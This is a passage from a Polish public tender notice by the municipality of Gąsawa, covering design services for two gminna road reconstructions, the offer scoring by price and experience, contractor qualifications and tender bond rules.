class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni i porówna jedynie te oferty, które nie zostaną odrzucone z postępowania. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>1) kryterium „C” - cena wykonania zamówienia – 60,0 pkt .<br/><br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksymalnie 60 punktów.<br/>Pozostałym Wykonawcom przypisana zostanie odpowiednio mniejsza ilość punktów.<br/>Ocena ofert w zakresie kryterium „C” –cena zostanie dokonana według poniższego algorytmu.<br/><br/>Liczba punktów „C” = (najniższa oferowana cena brutto / cena brutto oferty badanej) x 60<br/>a) Podstawą przyznania punktów w kryterium &#34;cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym. Zamawiający wymaga aby Wykonawca w formularzu ofertowym podał łączną cenę ryczałtową za wykonanie całego przedmiotu zamówienia.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/><br/>2) kryterium „D” doświadczenie Wykonawcy – liczba wykonanych dokumentacji projektowych w zakresie budowy lub przebudowy dróg, objętych następnie decyzją zezwalającą na realizację inwestycji drogowej na podstawie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych – 40 pkt,<br/> gdzie minimalna wymagana liczba wynosi 2. <br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksymalnie 40 punktów.<br/>Pozostałym Wykonawcom przypisana zostanie odpowiednio mniejsza ilość punktów.<br/><br/>Ocena ofert w zakresie kryterium „D” – doświadczenie zostanie dokonana według poniższego wzoru.<br/>liczba wykonanych dokumentacji objętych ZRID – 2 – 0 punktów<br/>liczba wykonanych dokumentacji objętych ZRID – 3– 10 punktów<br/>liczba wykonanych dokumentacji objętych ZRID – 4 – 20 punktów<br/>liczba wykonanych dokumentacji objętych ZRID – 5 – 30 punktów<br/>liczba wykonanych dokumentacji objętych ZRID – 6 i więcej – 40 punktów<br/><br/>2. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Zamawiający dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi gminnej nr 130611 C Chomiąża Szlachecka - Laski Wielkie<br/><br/>Lokalizacja: województwo kujawsko-pomorskie, powiat żniński, gmina Gąsawa, miejscowość Laski Wielkie, Chomiąża Szlachecka.<br/><br/>Droga obecnie o statusie drogi gminnej publicznej, stanowiąca dojazd do gruntów rolnych oraz zabudowy letniskowej i mieszkaniowej. Droga o nawierzchni gruntowej, częściowo utwardzona tłuczniem o niewystarczającej nośności. <br/><br/>Zakres przebudowy: od skrzyżowania z drogą powiatową wraz z przebudową skrzyżowania - Dz. nr 54/1, 152 obręb Laski Wielkie – Małe, 104, 107/20, 114, 115/18, 115/10, 106, 116/14, 7/5 do istniejącej nawierzchni bitumicznej obręb Chomiąża Szlachecka (wjazd do ośrodka wypoczynkowego ROMA). <br/>Długość ok. 1850 m <br/><br/>Szerokość projektowa jezdni o nawierzchni bitumicznej 4,5 m + pobocza tłuczniowe<br/>Zakres prac: Korytowanie, warstwa odsączająca, podbudowa, warstwa wiążąca z asfaltobetonu, warstwa ścieralna z asfaltobetonu, pobocza, zjazdy. <br/><br/>W związku z ograniczoną szerokością dostępnego pasa drogowego, może zaistnieć konieczność dokonania w niewielkim zakresie geodezyjnego podziału kilku działek przylegających do drogi gminnej, w celu jej poszerzenia, (a następnie ich wykupu przez Inwestora) oraz przygotowania dokumentacji niezbędnej do uzyskania decyzji zezwalającej na realizację inwestycji drogowej na podstawie ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych. <br/><br/>Zakres prac projektowych: <br/>a)	projekt zagospodarowania terenu, <br/>b)	projekt techniczny, z przekrojami, niweletą, <br/>c)	szczegółowa Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych, <br/>d)	projekt stałej organizacji ruchu, <br/>e)	przedmiar robót, <br/>f)	kosztorys inwestorski, <br/>g)	wykonanie wszelkich opracowań, uzyskania uzgodnień, opinii od właściwych organów, niezbędnych do złożenia wniosku oraz uzyskania decyzji ZRID, w tym projekty podziałów nieruchomości w celu poszerzenia pasa drogowego. <br/>h)	Inne, niewymienione wyżej opracowania, w tym dokumenty niezbędne do uzyskania decyzji o środowiskowych uwarunkowaniach realizacji przedsięwzięcia, takie jak karta informacyjna przedsięwzięcia lub raport oddziaływania na środowisko. <br/><br/>W oparciu o analizę szerokości działek drogowych na podstawie map szacuje się wykonanie prawdopodobnie podziałów 2 nieruchomości. Ostateczny zakres niezbędnych poszerzeń pasa drogowego oraz podziałów w celu zaprojektowania przebudowy drogi zgodnie z warunkami technicznymi, zostanie określony przez Projektanta w porozumieniu z Zamawiającym.<br/><br/>Zamawiający dysponuje mapą do celów projektowych dla planowanego zamierzenia inwestycyjnego, które w formacie pdf i dxf udostępni Wykonawcy. <br/>Wykonawca na etapie prac projektowych zobowiązany jest do bieżącego uzgadniania z Zamawiającym rozwiązań projektowych, w tym warstw konstrukcyjnych, zastosowanych materiałów, itp., propozycji podziałów nieruchomości, organizacji ruchu.<br/><br/>Dokumentacja w wersji papierowej w 5 egz. oraz elektronicznej w formacie pdf. , z wyjątkiem przedmiaru robot i kosztorysu, który należy wykonać w 2 egz. w wersji papierowej i elektronicznej w formacie pdf i ath.<br/>Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, zobowiązany jest przed zawarciem umowy do przedłożenia harmonogramu rzeczowo-finansowego, obrazującego etapy prac projektowych do akceptacji przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni i porówna jedynie te oferty, które nie zostaną odrzucone z postępowania. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>1) kryterium „C” - cena wykonania zamówienia – 60,0 pkt .<br/><br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksymalnie 60 punktów.<br/>Pozostałym Wykonawcom przypisana zostanie odpowiednio mniejsza ilość punktów.<br/>Ocena ofert w zakresie kryterium „C” –cena zostanie dokonana według poniższego algorytmu.<br/><br/>Liczba punktów „C” = (najniższa oferowana cena brutto / cena brutto oferty badanej) x 60<br/>a) Podstawą przyznania punktów w kryterium &#34;cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym. Zamawiający wymaga aby Wykonawca w formularzu ofertowym podał łączną cenę ryczałtową za wykonanie całego przedmiotu zamówienia.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/><br/>2) kryterium „D” doświadczenie Wykonawcy – liczba wykonanych dokumentacji projektowych w zakresie budowy lub przebudowy dróg, objętych następnie decyzją zezwalającą na realizację inwestycji drogowej na podstawie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych – 40 pkt,<br/> gdzie minimalna wymagana liczba wynosi 2. <br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksymalnie 40 punktów.<br/>Pozostałym Wykonawcom przypisana zostanie odpowiednio mniejsza ilość punktów.<br/><br/>Ocena ofert w zakresie kryterium „D” – doświadczenie zostanie dokonana według poniższego wzoru.<br/>liczba wykonanych dokumentacji objętych ZRID – 2 – 0 punktów<br/>liczba wykonanych dokumentacji objętych ZRID – 3– 10 punktów<br/>liczba wykonanych dokumentacji objętych ZRID – 4 – 20 punktów<br/>liczba wykonanych dokumentacji objętych ZRID – 5 – 30 punktów<br/>liczba wykonanych dokumentacji objętych ZRID – 6 i więcej – 40 punktów<br/><br/>2. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Zamawiający dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi gminnej nr 130614 C w Rozalinowie <br/>Lokalizacja: województwo kujawsko-pomorskie, powiat żniński, gmina Gąsawa, miejscowość Rozalinowo <br/>Od skrzyżowania obejmującego dz. nr 50/1, 50/2, poprzez dz. nr 53, do dz. nr 64/22 (część) <br/>Długość ok. 750 m <br/>Szerokość 3,5 m + pobocza tłuczniowe i mijanki<br/><br/>Droga obecnie o statusie drogi gminnej publicznej, stanowiąca dojazd do zabudowy letniskowej i mieszkaniowej. Droga o nawierzchni gruntowej, częściowo utwardzona tłuczniem o niewystarczającej nośności. <br/><br/>Zakres prac: Korytowanie, warstwa odsączająca, podbudowa, warstwa wiążąca z asfaltobetonu, warstwa ścieralna z asfaltobetonu, pobocza, zjazdy, mijanki. <br/>W związku z ograniczoną szerokością dostępnego pasa drogowego, może zaistnieć konieczność dokonania geodezyjnego podziału kilku działek przylegających do drogi gminnej, w celu jej poszerzenia, (a następnie ich wykupu przez Inwestora) oraz przygotowania dokumentacji niezbędnej do uzyskania decyzji zezwalającej na realizację inwestycji drogowej na podstawie ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych. <br/><br/>Zakres prac projektowych: <br/>a)	projekt zagospodarowania terenu, <br/>b)	projekt techniczny, z przekrojami, niweletą, <br/>c)	szczegółowa Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych, <br/>d)	projekt stałej organizacji ruchu, <br/>e)	przedmiar robót, <br/>f)	kosztorys inwestorski, <br/>g)	wykonanie wszelkich opracowań, uzyskania uzgodnień, opinii od właściwych organów, niezbędnych do złożenia wniosku oraz uzyskania decyzji ZRID, w tym projekty podziałów nieruchomości w celu poszerzenia pasa drogowego. <br/>h)	Inne, niewymienione wyżej opracowania, niezbędne do wykonania kompletnego projektu. <br/><br/>W oparciu o analizę szerokości działek drogowych na podstawie map szacuje się wykonanie prawdopodobnie podziałów 8 nieruchomości. Ostateczny zakres niezbędnych poszerzeń pasa drogowego oraz podziałów w celu zaprojektowania przebudowy drogi zgodnie z warunkami technicznymi, zostanie określony przez Projektanta w porozumieniu z Zamawiającym.<br/><br/>Zamawiający dysponuje mapą do celów projektowych dla planowanego zamierzenia inwestycyjnego, które w formacie pdf i dxf udostępni Wykonawcy. <br/>Wykonawca na etapie prac projektowych zobowiązany jest do bieżącego uzgadniania z Zamawiającym rozwiązań projektowych, w tym warstw konstrukcyjnych, zastosowanych materiałów, itp., propozycji podziałów nieruchomości, organizacji ruchu.<br/><br/>Dokumentacja w wersji papierowej w 5 egz. oraz elektronicznej w formacie pdf. , z wyjątkiem przedmiaru robot i kosztorysu, który należy wykonać w 2 egz. w wersji papierowej i elektronicznej w formacie pdf i ath.<br/>Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, zobowiązany jest przed zawarciem umowy do przedłożenia harmonogramu rzeczowo-finansowego, obrazującego etapy prac projektowych do akceptacji przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni i porówna jedynie te oferty, które nie zostaną odrzucone z postępowania. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>1) kryterium „C” - cena wykonania zamówienia – 60,0 pkt .<br/><br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksymalnie 60 punktów.<br/>Pozostałym Wykonawcom przypisana zostanie odpowiednio mniejsza ilość punktów.<br/>Ocena ofert w zakresie kryterium „C” –cena zostanie dokonana według poniższego algorytmu.<br/><br/>Liczba punktów „C” = (najniższa oferowana cena brutto / cena brutto oferty badanej) x 60<br/>a) Podstawą przyznania punktów w kryterium &#34;cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym. Zamawiający wymaga aby Wykonawca w formularzu ofertowym podał łączną cenę ryczałtową za wykonanie całego przedmiotu zamówienia.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/><br/>2) kryterium „D” doświadczenie Wykonawcy – liczba wykonanych dokumentacji projektowych w zakresie budowy lub przebudowy dróg, objętych następnie decyzją zezwalającą na realizację inwestycji drogowej na podstawie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych – 40 pkt,<br/> gdzie minimalna wymagana liczba wynosi 2. <br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksymalnie 40 punktów.<br/>Pozostałym Wykonawcom przypisana zostanie odpowiednio mniejsza ilość punktów.<br/><br/>Ocena ofert w zakresie kryterium „D” – doświadczenie zostanie dokonana według poniższego wzoru.<br/>liczba wykonanych dokumentacji objętych ZRID – 2 – 0 punktów<br/>liczba wykonanych dokumentacji objętych ZRID – 3– 10 punktów<br/>liczba wykonanych dokumentacji objętych ZRID – 4 – 20 punktów<br/>liczba wykonanych dokumentacji objętych ZRID – 5 – 30 punktów<br/>liczba wykonanych dokumentacji objętych ZRID – 6 i więcej – 40 punktów<br/><br/>2. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Zamawiający dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>a) Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że wykonał nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, przynajmniej dwie usługi projektowe polegające na zaprojektowaniu budowy lub przebudowy drogi objętej następnie decyzją zezwalającą na realizację inwestycji drogowej na podstawie ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.<br/>b) Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje osobą/osobami posiadającymi doświadczenie zawodowe tj. uprawnienia budowlane do projektowania w specjalności drogowej bez ograniczeń od przynajmniej 3 lat, w zakresie wymaganymi przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2024 r., poz. 725) i rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie ( Dz. U. z 2019 r. poz. 831).<br/>Ocena spełniania warunku zostanie dokonana na podstawie przedłożonych przez wykonawcę dokumentów o których mowa w rozdziale X, ust.4 SWZ - na zasadzie „spełnia – nie spełnia”.<br/>Powyższe warunki określone w lit. a) i b) muszą zostać spełnione łącznie.<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej - dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe wymagane od wykonawcy, na potwierdzenie niepodlegania wykluczeniu, obejmują:<br/>1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r. poz. 1616), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - Formularz nr 4 do SWZ;<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od wykonawcy, na potwierdzenie spełniania warunków udziału w postępowaniu, obejmują:<br/>1) wykaz usług porównywalnych z usługami stanowiącymi przedmiot zamówienia, wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane w okresie ostatnich 3 miesięcy Formularz nr 5 do SWZ;<br/>2) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie z Formularzem nr 6 do SWZ;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) oświadczenie, o którym mowa w Rozdziale X ust. 1 SWZ;<br/>2) zobowiązanie innego podmiotu, o którym mowa w Rozdziale XI ust. 3 SWZ (jeżeli dotyczy) ;<br/>3) dowód wniesienia wadium – oryginał gwarancji bądź poręczenia;<br/>4) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa, umowy spółki (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium.<br/>Dla części nr 1: Przebudowa drogi gminnej w Godawach - w kwocie 500 zł;<br/>Dla części nr 2: Przebudowa drogi gminnej w Drewnie - w kwocie 350 zł;<br/>Dla części nr 3: Przebudowa drogi gminnej nr 130611 C Chomiąża Szlachecka - Laski Wielkie - w kwocie 800 zł;<br/>Dla części nr 4: Przebudowa drogi gminnej nr 130614 C w Rozalinowie - w kwocie 350 zł.<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2024 r. poz. 419 z późn. zm.).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto w Banku Spółdzielczym „Pałuki” w Żninie nr rachunku 72 8181 0000 0000 0055 2000 0005 z dopiskiem &#34;Wadium – IRG.271.4.2025 Część nr ….&#34; (wskazać nr części, której dotyczy wadium).<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie p.z.p.<br/>2) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest: Gmina Gąsawa<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. zostanie odrzucona.<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający 